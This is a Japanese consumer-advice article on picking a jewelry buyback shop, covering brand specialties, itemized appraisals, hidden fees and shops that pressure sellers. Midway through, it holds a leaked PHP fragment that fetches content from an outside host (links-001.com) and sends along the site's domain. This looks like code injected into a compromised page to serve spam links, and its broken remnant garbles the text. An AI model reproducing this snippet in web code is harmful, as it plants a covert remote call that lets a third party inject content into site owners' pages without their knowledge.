前へ
次へ

宝石の買取店選びは慎重に

自分で買ったものでも誰かからプレゼントされたものでも、宝石には特別な思い入れがある人が多いでしょう。
高価な物だからということもありますが、たとえば成人を機に両親から贈られたものであったり、大切に想っている人からの贈り物であったりと忘れられない思い出と共に手にした物が多いからです。
そんな思い出の品でも、さまざまな事情によって手放すことになることもあるでしょう。
そんなときに利用するのが専門の買取店ですが、後で後悔しないようにお店選びはしっかりしなければなりません。
まず最初に気をつけたいのはその買取店の全体的な傾向です。
たとえば、特定のブランドを重点的に買い取っているとか、著名なデザイナーの作品なら高値で引き取っているとかいったことです。
これは有名なブランドの宝石だから高値で買い取ってくれるだろうと持ち込んでも、その店が他のブランドのほうに力を入れていれば、当然査定も低くなります。
少しでも高く引き取ってもらうためにも、そうした傾向はネットの口コミなどで細かくリサーチするのが得策です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

査定の方法にも気をつけたいところで、たとえばその買取価格になった内訳はできるかぎり細かく教えてくれる店にしましょう。
宝石の鑑定額が現在の相場にそったものであるのはもちろん、装飾に使われている材質についての査定単価も詳しく提示してくれるところが望ましいです。
その際、特に注意したいのが手数料の有無とそれが査定額に含まれているか否かです。
当然、手数料なしで他店より高く買い取ってくれる店舗のほうが良いので、金額だけを聞いて内訳の確認をし忘れることがないようにしましょう。
最後に買取店を決めるときに見極めたいのが、そのお店の宝石に対する態度です。
インターネットなどで調べてみればわかりますが、最近は直接店舗に持ち込むほかに宅配や出張でも査定を行なっているところが増えています。
そして、とにかくスピードとお得なキャンペーンを全面に出して、急いで売らせようとするお店も目立ちます。
しかし、そのように急かすお店ほど自分たちの査定に自信がなく、他店に持って行かれることを心配している可能性が高いです。
大切にしてきた思い入れのある品物ですから、1つ1つの品を丁寧に査定してくれるところを選ぶのが無難です。

Page Top